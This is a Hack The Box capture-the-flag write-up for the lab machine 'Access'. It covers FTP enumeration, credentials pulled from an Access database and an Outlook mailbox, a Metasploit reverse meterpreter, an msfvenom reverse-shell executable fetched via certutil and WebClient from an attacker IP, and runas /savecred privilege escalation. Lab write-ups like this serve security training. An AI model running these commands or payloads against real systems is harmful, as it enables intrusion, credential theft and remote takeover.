Writeup: Hack The Box — Access

Description

Discovery

nmap -sV -sC -Pn -p- -T4 --min-rate 1000 --max-retries 5 10.10.10.98

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|_ SYST: Windows*NT
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|* Potentially risky methods: TRACE
|\_http-server-header: Microsoft-IIS/7.5
|\_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Pwn

The FTP allows Anonymous logins but no directory listing:

ncftpget -R -v -u anonymous 10.10.10.98 . .

Downloads all files from the service.

In /Backups we got a “backup.mdb” file. This file is where Microsoft Access stores the database.

file Backups/backup.mdb
Backups/backup.mdb: Microsoft Access Database

To read this without Access we can install and use “mdbtools”. We can read all tables name using:

mdb-schema backup.mdb |rg "CREATE TABLE" | cut -d " " -f3

id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,

Now we got some credentials to use but none of them worked on telnet service on port 23.

From the other FTP folder /Engineer we got a password protected ZIP: “Control.zip”.

With 7zip x Access\ Control.zip and password access4u@security (from the previous dump) we extracted a pst file (“Access Control.pst”).

file Engineer/Access\ Control.pst
Engineer/Access Control.pst: Microsoft Outlook email folder (>=2003)

This file is the Outlook equivalent of a mbox file (Thunderbird); with “libpst” we converted the file to a Unix readable format:

readpst Access\ Control.pst

From "john@megacorp.com" Fri Aug 24 01:44:07 2018
Status: RO
From: john@megacorp.com <john@megacorp.com>
Subject: MegaCorp Access Control System "security" account
To: 'security@accesscontrolsystems.com'
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="--boundary-LibPST-iamunique-1031197216_-_-"


----boundary-LibPST-iamunique-1031197216_-_-
Content-Type: multipart/alternative;
boundary="alt---boundary-LibPST-iamunique-1031197216_-_-"

--alt---boundary-LibPST-iamunique-1031197216_-_-
Content-Type: text/plain; charset="utf-8"

Hi there,



The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.



Regards,

John


--alt---boundary-LibPST-iamunique-1031197216_-_-
Content-Type: text/html; charset="us-ascii"

[...]

--alt---boundary-LibPST-iamunique-1031197216_-_---

----boundary-LibPST-iamunique-1031197216_-_---

Now we have another tuple of credentials:

security:4Cc3ssC0ntr0ller

With this pair we can finally login to telnet and get the first flag.

User flag

Since the shell from telnet was very bad we upgraded it to a meterpreter one:

msfconsole -x "use exploit/multi/script/web_delivery; set URIPATH dodometer; set LPORT 3444; set LHOST $(ip addr show tun0 | grep -Po "inet \K[\d.]+"); set SRVHOST $(ip addr show tun0 | grep -Po "inet \K[\d.]+"); set SRVPORT 8081; set target PSH; set payload windows/x64/meterpreter/reverse_tcp; run -j"
Meterpreter Session (sysinfo and getuid)

In C:\Users\Public\Desktop folder we found a “lnk” file to run a monitoring software (“ZKTeco”) without credentials as user Administrator.

The /savecred flag will instruct the system to ask the Administrator password only once, the first run, and then store it for all the following executions.

We can now abuse this functionality to run arbitrary commands as Administrator. First of all we created a meterpreter PE to be executed:

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4455 -f exe -o rev.exe

We used a simple reverse shell since the command runas will spawn the EXE without waiting for it to download the stage.

With the previous session we uploaded the PE on the remote machine; it could also be done using impacket and PowerShell:

New-Object System.Net.WebClient.DownloadFile("http://10.10.XX.XX/rev.exe", "rev.exe")

or

certutil.exe -urlcache -split -f http://10.10.XX.XX/rev.exe rev.exe

Now issuing the command:

runas /user:ACCESS\Administrator /savecred "C:\Users\security\rev.exe

we got an “Administration” shell and the possibility to read the system flag.

Root flag